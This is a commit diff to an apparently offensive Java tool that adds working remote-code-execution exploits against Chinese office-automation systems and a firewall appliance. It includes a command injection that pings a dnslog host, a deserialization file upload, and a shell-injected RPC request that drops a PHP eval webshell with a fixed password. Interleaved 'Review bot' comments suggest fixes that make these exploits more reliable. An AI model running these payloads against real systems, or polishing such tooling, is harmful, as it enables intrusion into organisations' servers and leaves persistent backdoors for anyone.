
10-07
White-hua committed Oct 7, 2022
2 parents e55def0 + 8df4cee commit 7a9d3d6
Showing 28 changed files with 442 additions and 17 deletions.
19 changes: 16 additions & 3 deletions README.md
Expand Up @@ -10,17 +10,29 @@ e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)
e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)

蓝凌:
landray_datajson-RCE (可直接执行系统命令)
landray_treexmlTmpl-RCE (可直接执行系统命令)
landray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)

用友:
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)
yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)
yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)
yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)

中间件:
IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)

安全设备:
综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)

网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)

使用截图:
![1](https://user-images.githubusercontent.com/100954709/193958411-6535df75-f731-435b-af43-2bfedb2bf271.png)
![2](https://user-images.githubusercontent.com/100954709/193958423-8eef5bd3-1da0-458b-a5db-8c46809e9fd3.png)
![3](https://user-images.githubusercontent.com/100954709/193958439-cdaf1a64-55f4-4afb-9a44-cfec5e237208.png)

---
## 工具模块:

Expand All @@ -38,7 +50,8 @@ Tasklist敏感进程检测

---
## 问题反馈
可直接提Issu 或加我wx进群交流
可直接提Issu
或加我wx进群交流,微信请备注apt

![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)

17 changes: 11 additions & 6 deletions src/main/java/Controller/AttController.java
Expand Up @@ -161,7 +161,7 @@ void Att_clicked(MouseEvent event){ //ATT按钮
}
}
}
textArea_attInfo.appendText("\n\n获取shell请单选 不支持批量getshell");
textArea_attInfo.appendText("\n\n如需获取shell请勾选 getshell并选择具体漏洞");

}else if(vulname != null){

Expand Down Expand Up @@ -189,7 +189,6 @@ void Att_clicked(MouseEvent event){ //ATT按钮
@FXML
public void initialize(){
textArea_info.setText("------------------------------------目前EXP如下--------------------------------");
textArea_info.appendText("\n\n<<<<<-----------------------------OA类------------------------------>>>>>");
textArea_info.appendText("\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
Expand All @@ -198,15 +197,19 @@ public void initialize(){
textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)");

textArea_info.appendText("\n\nlandray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)");
textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");

textArea_info.appendText("\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
textArea_info.appendText("\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");

textArea_info.appendText("\n\n<<<<<---------------------------中间件---------------------------->>>>>");
textArea_info.appendText("\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");
textArea_info.appendText("\n\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");

textArea_info.appendText("\n\n<<<<<--------------------------安全设备---------------------------->>>>>");
textArea_info.appendText("\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");

textArea_info.appendText("\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");

Expand Down Expand Up @@ -257,6 +260,8 @@ else if(listview_kinds.getSelectionModel().getSelectedItem().equals("IIS")){

else if(listview_kinds.getSelectionModel().getSelectedItem().equals("海康")){
choiceBox_exp.setItems(Kinds_Exp.hik());
}else if(listview_kinds.getSelectionModel().getSelectedItem().equals("奇安信")){
choiceBox_exp.setItems(Kinds_Exp.qianxin());
}
}
}
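Review bot: The added `奇安信` branch calls `.equals("奇安信")` on `listview_kinds.getSelectionModel().getSelectedItem()`, which is null when the list has no selection, so the whole else-if chain throws a NullPointerException in that state; the literal-first form is null-safe: `}else if("奇安信".equals(listview_kinds.getSelectionModel().getSelectedItem())){`. This is probably rare if the chain only runs from a selection handler, but the repeated lookup also makes the chain hard to read — reading the selected item once into a local and switching on it would fix both. The enclosing method starts outside this hunk. Note also that the same device is labelled `网康` in the `initialize()` text while the list key is `奇安信`; a user searching the EXP list for the branch name will not find it.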
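--- /dev/null
+++ b/src/main/java/Exp/OA/landrayoa/landray_datajson.java
@@ -0,0 +1,47 @@
+package Exp.OA.landrayoa;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class landray_datajson implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        textArea.appendText("\n 该漏洞已直接执行系统命令,无需getshell");
+        return false;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        String dnspath = shell.readFile(shell.dnspath).replace("http://","");
+        String replace = dnspath.replace("/", "");
+        String payload = "?s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"ping%20" + replace + "\")&type=1";
+        Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+        int dns_1 = dns_le1.getText().length();
+
+        Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
+
+        try { Thread.sleep (5000) ;
+        } catch (Exception ie){}
+
+        Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+        int dns_2 = dns_le2.getText().length();
+
+        if(dns_2 > dns_1){
+            textArea.appendText("\n漏洞存在-收到dnslog回显 \n " + url + payload + "\n");
+            return true;
+        }else {
+            textArea.appendText("\nlandray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+}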
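Review bot: The command injected in `payload` is `ping <dnslog-host>` with no count flag, so on a Linux target `ping` never exits and every check leaves a runaway process that keeps beaconing to the dnslog domain; `nslookup <host>` resolves once and exits on both Linux and Windows, or use `ping -c 1` / `ping -n 1` if the platform is known. The `Thread.sleep(5000)` handler swallows `InterruptedException` — add `Thread.currentThread().interrupt();` inside the catch so a cancelled scan actually stops. Detection is `dns_2 > dns_1`, i.e. the dnslog listing grew in bytes during the five-second window, so any unrelated record landing on a shared dnslog token counts as a hit; matching the response for the specific host string you sent would be tighter. The `response` from the probe GET is never inspected, so a 4xx/5xx from the target is indistinguishable from a successful blind call — at least print its status code next to the verdict.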
85 changes: 85 additions & 0 deletions src/main/java/Exp/OA/landrayoa/landray_sysSearchMain.java

Large diffs are not rendered by default.

38 changes: 38 additions & 0 deletions src/main/java/Exp/OA/landrayoa/landray_treexmlTmpl.java

Large diffs are not rendered by default.

15 changes: 10 additions & 5 deletions src/main/java/Exp/OA/weaveroa/weaveroa_office_UploadFile.java
Expand Up @@ -12,12 +12,20 @@ public class weaveroa_office_UploadFile implements Exploitlnterface {
@Override
public Boolean checkVul(String url, TextArea textArea) {
Boolean att = att(url,shell.Testpath,textArea);
if(att == null){
textArea.appendText("\n e-office logo_UploadFile.php-RCE - 漏洞不存在 (出现误报请联系作者)");
return false;
}
return att;
}

@Override
public Boolean getshell(String url, TextArea textArea) {
Boolean att = att(url, shell.Phppath, textArea);
if(att == null){
textArea.appendText("\n 漏洞存在 被WAF拦截 请手动复现");
return true;
}
return att;
}

Expand All @@ -36,14 +44,11 @@ private Boolean att(String url,String Path,TextArea textArea){

if(post.getCode() == 200 && post.getText().contains("logo-eoffice.php")){
Response response = HttpTools.get(url + "/images/logo/logo-eoffice.php", new HashMap<String, String>(), "utf-8");
System.out.println("到这了");
System.out.println(response.getText());
if(response.getText().contains(shell.test_payload)){
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
textArea.appendText("\n 漏洞存在 测试文件写入成功 \n "+ url + "/images/logo/logo-eoffice.php");
return true;
}else {
textArea.appendText("\n 漏洞可能存在,疑似WAF拦截,请手动复现");
return false;
return null;
}

}else {
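Review bot: The new `return null` in the WAF branch makes `checkVul` print two contradictory verdicts on that path — `att()` first writes `漏洞可能存在,疑似WAF拦截,请手动复现`, then `checkVul` writes `漏洞不存在 (出现误报请联系作者)` — while `getshell` maps the same value to `漏洞存在 被WAF拦截`. A three-valued `Boolean` is also fragile: any caller that unboxes `att()` directly (`if (att)`) throws a NullPointerException. At minimum drop the `漏洞不存在` line from the null branch in `checkVul` and keep only the message `att()` already emitted; a cleaner fix is a small private enum (`VULNERABLE`, `NOT_VULNERABLE`, `BLOCKED`) returned by `att()` and translated once in each public method. `att()` continues past the end of this hunk.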
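--- /dev/null
+++ b/src/main/java/Exp/OA/yongyou/yongyou_nc_FileReceiveServlet.java
@@ -0,0 +1,116 @@
+package Exp.OA.yongyou;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.util.HashMap;
+import java.util.Iterator;
+import java.util.Map;
+
+public class yongyou_nc_FileReceiveServlet implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Boolean shell = shell(url, textArea);
+        return shell;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        Response response = new Response(0, (String)null, (String)null, (String)null);
+        try {
+            HashMap<String,String> head = new HashMap<>();
+            head.put("Content-Type","multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/FileReceiveServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+            Iterator var5 = head.keySet().iterator();
+
+            while(var5.hasNext()) {
+                String key = (String)var5.next();
+                coon.setRequestProperty(key, (String)head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo=new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
+            metaInfo.put("FILE_NAME","nishizhu.txt");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.test_payload.getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            response = HttpTools.getResponse(coon,"utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+            if(get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)){
+                textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
+                return true;
+            }else {
+                textArea.appendText("\n nc_FileReceiveServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+                return false;
+            }
+
+        } catch (Exception e) {
+            textArea.appendText("\n nc_FileReceiveServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+            textArea.appendText("\n 连接异常!!!");
+        }
+        return false;
+    }
+
+    private Boolean shell(String url,TextArea textArea){
+        Response response = new Response(0, (String)null, (String)null, (String)null);
+        try {
+            HashMap<String,String> head = new HashMap<>();
+            head.put("Content-Type","multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/FileReceiveServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+            Iterator var5 = head.keySet().iterator();
+
+            while(var5.hasNext()) {
+                String key = (String)var5.next();
+                coon.setRequestProperty(key, (String)head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo=new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
+            metaInfo.put("FILE_NAME","nishizhu.jsp");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.readFile(shell.Jsppath).getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            response = HttpTools.getResponse(coon,"utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
+            if(get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)){
+                textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
+                return true;
+            }else {
+                textArea.appendText("\n shell被查杀 请免杀!!!!!!!!");
+                return false;
+            }
+
+        } catch (Exception e) {
+            textArea.appendText("\n 连接异常!!!");
+        }
+        return false;
+    }
+
+}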
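Review bot: `att()` and `shell()` are the same ~40 lines differing only in the `FILE_NAME` value and the bytes written after the serialized map, so every later fix (charset, error handling, cleanup) has to be made twice; fold the request into one private helper and have both call it, as sketched below. In `att()` the `catch (Exception e)` also prints `nc_FileReceiveServlet-RCE-漏洞不存在` for a connection failure, so an unreachable host is reported exactly like a patched one — print the exception class/message and return false without the "not vulnerable" verdict. Both methods leave `nishizhu.txt` / `nishizhu.jsp` under `webapps/nc_web` with fixed, publicly known names, which an authorized tester should expect to clean up afterwards; the `response` from `getResponse` is assigned but never read, and `getBytes()` without a charset depends on the platform default.
```java
// Sends one FileReceiveServlet request: the serialized metaInfo map first, then the raw file bytes.
private Response send(String url, String fileName, byte[] body) throws Exception {
    HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/FileReceiveServlet");
    coon.setRequestMethod("POST");
    coon.setDoOutput(true);
    coon.setDoInput(true);
    coon.setUseCaches(false);
    coon.setRequestProperty("Content-Type", "multipart/form-data;");
    try (OutputStream outputStream = coon.getOutputStream();
         ObjectOutputStream out = new ObjectOutputStream(outputStream)) {
        Map<String, Object> metaInfo = new HashMap<>();
        metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
        metaInfo.put("FILE_NAME", fileName);
        out.writeObject(metaInfo);
        out.flush();               // map bytes go out before the raw body, same order as before
        outputStream.write(body);
        outputStream.flush();
    }
    return HttpTools.getResponse(coon, "utf-8");
}
// … unchanged: att()/shell() become send(url, "nishizhu.txt", …) / send(url, "nishizhu.jsp", …) followed by the existing GET check …
```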
Expand Up @@ -18,6 +18,7 @@ public Boolean checkVul(String url, TextArea textArea) {

@Override
public Boolean getshell(String url, TextArea textArea) {
textArea.appendText("\n 该漏洞不支持getshell 请自行开启ladp服务利用");
return false;
}

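Review bot: The added message reads `ladp`; the service meant is LDAP (the README and the `initialize()` EXP list carry the same typo), so the line should be `textArea.appendText("\n 该漏洞不支持getshell 请自行开启LDAP服务利用");`. Returning false from a `getshell` that deliberately attempts nothing is fine, but the file header for this section is not shown on the page, so I cannot confirm which exploit class this belongs to.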
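--- /dev/null
+++ b/src/main/java/Exp/equipment/qianxin/ngfw_waf_router.java
@@ -0,0 +1,59 @@
+package Exp.equipment.qianxin;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class ngfw_waf_router implements Exploitlnterface{
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea, "nishizhu.txt", shell.Testpath);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Boolean att = shell(url,textArea);
+        return att;
+    }
+
+    private Boolean att(String url,TextArea textArea,String filename,String filepath){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+        String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '" + shell.readFile(filepath) +"' >/var/www/html/" + filename + "\"]}],\"type\":\"rpc\",\"tid\":17}";
+        Response post = HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
+        if(post.getCode() == 200 && post.getText().contains("success")){
+            Response response = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");
+            if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                textArea.appendText("\n 漏洞存在,测试文件已写入 \n" + url + "/" + filename);
+                return true;
+            }else {
+                textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+                return false;
+            }
+        }else {
+            textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+        String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '9df37afc77bdd582d90aefaf4e35c63e<?php @eval($_POST[nishizhu]);?>' > /var/www/html/nishizhu.php\"]}],\"type\":\"rpc\",\"tid\":17}";
+        Response post = HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
+        Response response = HttpTools.get(url + "/nishizhu.php", new HashMap<String, String>(),"utf-8");
+        if(response.getCode() == 200 && response.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")){
+            textArea.appendText("\n shell写入成功 \n" + url + "/nishizhu.php");
+            textArea.appendText("\n 请使用菜刀连接 密码为 nishizhu");
+            return true;
+        }else {
+            textArea.appendText("\n 疑似查杀 请自行复现");
+            return false;
+        }
+    }
+}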
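Review bot: `shell()` skips the `post.getCode() == 200 && post.getText().contains("success")` gate that `att()` applies, so a WAF block or 4xx on the RPC call is reported as `疑似查杀` instead of as the request failing; add the same check before the follow-up GET: `if(post.getCode() != 200 || !post.getText().contains("success")){ textArea.appendText("\n NGFW_waf_router-RCE-请求未成功"); return false; }`. In `att()` the contents of the file behind `filepath` are spliced into a single-quoted shell string (`echo '…' >`), so a single quote or other metacharacter in that file breaks the command and yields a false `漏洞不存在`; if the appliance has `base64`, sending the payload base64-encoded and decoding it on the target avoids the quoting problem. The dropped `nishizhu.php` has a fixed, publicly documented password, which turns a "test" into a standing foothold for anyone who reads this repository — generate the password per run, record it, and remove the file when done. Both paths write into `/var/www/html` with fixed names, so the test artifact `nishizhu.txt` is also left exposed on the box.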
4 changes: 4 additions & 0 deletions src/main/java/Test.java
@@ -1,4 +1,8 @@
import Utilss.shell;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {

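Review bot: The added `import com.sun.org.apache.bcel.internal.classfile.Utility;` reaches into a non-exported JDK-internal package; on JDK 9 and later javac rejects it unless the build passes `--add-exports java.xml/com.sun.org.apache.bcel.internal.classfile=ALL-UNNAMED`, so this line pins the project to JDK 8 (the `java.io`/`java.nio.file` imports beside it are fine). The class body is outside the hunk, so I cannot see whether `Utility` is used at all — if not, drop the import; if it is, replace the call with a public API such as `java.util.Base64` or a stdlib hex helper, depending on what it is used for.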
9 changes: 6 additions & 3 deletions src/main/java/Utilss/HttpTools.java
Expand Up @@ -108,8 +108,9 @@ public static Response upload(String url, HashMap<String,String> headers,byte[]

OutputStream out = new DataOutputStream(coon.getOutputStream());
File file = new File(filePath);
out.write(start_data);

if(start_data != null) {
out.write(start_data);
}
DataInputStream in = new DataInputStream(new FileInputStream(file));
byte[] bufferOut = new byte[1024];
int bytes = 0;
Expand All @@ -118,7 +119,9 @@ public static Response upload(String url, HashMap<String,String> headers,byte[]
}
out.write("\r\n".getBytes());
in.close();
out.write(end_data);
if(end_data != null) {
out.write(end_data);
}
out.flush();
out.close();

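Review bot: The null guards on `start_data`/`end_data` are fine, but the `DataInputStream` opened on `file` is closed only on the normal path (`in.close()` after the copy loop), so an IOException thrown while writing to `out` leaks the file handle; wrap it in try-with-resources, `try (DataInputStream in = new DataInputStream(new FileInputStream(file))) { … copy loop … }`, and do the same for `out`. `"\r\n".getBytes()` uses the platform default charset — harmless for CRLF, but `StandardCharsets.US_ASCII` makes the intent explicit. `upload()` starts and ends outside this hunk, so I cannot tell whether an outer `finally` already covers the close.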
